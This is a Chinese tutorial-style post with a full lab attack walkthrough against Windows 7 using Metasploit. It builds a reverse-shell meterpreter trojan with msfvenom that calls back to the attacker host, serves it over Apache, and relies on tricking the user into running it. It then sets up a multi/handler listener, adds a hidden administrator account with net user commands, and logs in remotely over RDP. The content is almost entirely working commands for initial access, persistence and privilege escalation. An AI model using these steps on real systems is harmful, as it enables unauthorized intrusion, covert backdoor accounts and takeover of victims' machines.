admin 管理员组

文章数量: 887839

一、环境准备

攻击机:kali     IP:192.168.63.53

靶机:Windows 7         IP:192.168.63.128

1、保证两台机器间可以互相ping通

 

2、关闭Windows防火墙、kali防火墙

二、kali生成木马

1、msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.63.53 lport=5555 -f exe >/home/ices/桌面/evilshell.exe

      参数解释:

-p -playload 攻击成功后做什么

-p ,-payload Payload to use:指定哪些有效载荷生成

-f, -format Output format:指定有效载荷的格式

  -f  后跟要生成后门文件的类型

      2、将木马文件evilshell.exe拷贝到/var/www/html,把html目录下的其余文件删除,并开启apache服务(提供一个可以把木马文件下载的平台)

cp evilshell.exe /var/www/html   拷贝木马文件到/var/www/html

rm -f index.html  删除index.html

rm -f insex.nginx-debian.html  删除index.html

3、在靶机上打开浏览器,访问站点http://192.168.63.53(kali的IP地址),并下载木马文件到桌面

4、开启postgresql服务,,postgresql的端口号为5432,开启MSF(msfconsole的缩写)

/etc/init.d/postgresql status  查看postgresql服务的状态

/etc/init.d/postgresql start  开启postgresql服务

netstat -ntulp  查看端口

msfconsole  开启MSF

5、加载exploits和payloads, 该模块需要设置的参数

msf5>use exploit/multi/handler 选择exploits

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp  设置payload

show options  查看所需设置的参数

6、设置监听IP和端口,要与生成木马中的命令中的lhost和lport一致

set lhost 192.168.63.53  设置监听地址

set lport 5555  设置监听端口

run 或者exploit  运行攻击模块

7、在靶机中诱导用户点击exe程序(社会工程学攻击),在kali中就会得到靶机的shell(meterpreter)

Windows环境下中文乱码解决办法:chcp 437

8、在靶机中加入一个隐藏用户($),提升隐藏用户权限

(注:靶机需登录管理员账户,否则无法添加成功)

net user host$ /add  添加隐藏用户host$

net user  查看用户

net user host$ 密码  为host$用户设置密码

net localgroup administrators host$ /add  将host$用户加入到管理员组中,从而提升权限

net user host$  查看host$用户信息

9、新打开一个终端,使用远程桌面连接靶机,进行操作

rdesktop 192.168.63.128

              连接失败的原因:靶机没有允许远程连接

           

      重新连接靶机,连接成功,使用隐藏用户登录靶机

     

     

进入远程桌面

本文标签: 木马 系统 Metasploit Windows